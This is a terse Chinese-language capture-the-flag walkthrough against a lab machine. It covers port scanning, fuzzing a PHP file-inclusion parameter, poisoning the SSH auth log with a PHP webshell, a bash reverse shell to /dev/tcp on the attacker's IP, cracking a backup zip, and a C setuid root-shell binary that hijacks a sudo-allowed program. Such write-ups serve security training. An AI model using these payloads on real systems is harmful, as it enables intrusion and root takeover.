kali:192.168.111.111
靶机:192.168.111.130
信息收集
端口扫描
nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.130
目录爆破
blog-post目录下存在两个目录
对archives目录中的randylogs.php进行测试发现存在文件包含
wfuzz -c -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/burp-parameter-names.txt --hc 404 --hh 0 http://192.168.111.130/blog-post/archives/randylogs.php?FUZZ=../../../../../../../../../../../../../etc/passwd
漏洞利用
成功包含ssh日志
http://192.168.111.130/blog-post/archives/randylogs.php?file=../../../../../../../../../var/log/auth.log
利用ssh写入webshell到ssh日志文件中,再配合文件包含拿shell
ssh '<?php system($_GET["cmd"]);?>'@192.168.111.130
文件包含ssh日志文件执行反弹shell
#需要进行url编码
bash -c 'exec bash -i >& /dev/tcp/192.168.111.111/4444 0>&1'
提权
在/var/backups目录下发现user_backup.zip压缩包
解压发现需要密码,把文件下载到本地爆破
zip2john user_backup.zip > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
解压后发现私钥文件和密码
利用私钥登录randy用户
ssh randy@192.168.111.130 -i id_rsa
randy用户sudo权限
查看/usr/randy/tools/easysysinfo.py后尝试修改环境变量提权,但没有成功,用c语言写一个程序替代easysysinfo
#include<stdlib.h>
int main()
{
setuid(0);
setgid(0);
system("/bin/bash");
}
gcc编译后执行,提升为root
gcc a.c -o easysysinfo
sudo -u root /home/randy/tools/easysysinfo
flag
